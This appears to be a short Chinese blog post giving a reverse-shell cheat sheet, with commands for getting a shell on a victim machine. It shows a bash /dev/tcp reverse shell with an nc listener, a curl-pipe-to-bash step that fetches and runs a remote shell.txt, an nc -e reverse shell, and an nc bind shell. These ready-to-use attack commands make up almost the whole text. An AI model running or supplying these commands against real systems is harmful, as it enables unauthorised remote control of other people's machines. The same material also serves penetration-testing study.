反彈Shell

說明:端口可任意,但要保持一致而且不能被佔用,以下均爲攻擊機登錄被攻擊機

bash連接

攻擊機器輸入 nc -lvp 7777

被攻擊機器輸入bash -i >& /dev/tcp/攻擊機ip/7777 0>&1  

然後攻擊機器就相當於登陸了了被攻擊機器

curl連接

在攻擊機根目錄下創建shell.txt,內容爲bash -i >& /dev/tcp/攻擊機ip/7777 0>&1

//注意shell.txt不是在服務器根目錄,而是例如/var/www/html下
被攻擊機執行curl 攻擊機ip/shell.txt|bash  //先curl獲得shell.txt的內容然後用bash執行

nc連接

說明:用nc連接成功後不會出現類似bash連接那種開頭的root@kali這種,可用pwd檢測是否連接成功

利用攻擊機ip

攻擊機輸入 nc -lvp 7777

被攻擊機輸入 nc -e /bin/bash 攻擊機ip 7777

利用被攻擊機ip

其他都是需要攻擊機ip,這個則相反。我的理解是需要攻擊機ip的相當於把shell彈給攻擊機(所以攻擊機ip和bash在一行代碼),而這個相當於在本地端口開個shell,攻擊機訪問端口來拿shell

攻擊機輸入 nc 被攻擊機ip 7777

被攻擊機輸入  nc -lvp 7777 -e /bin/bash

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章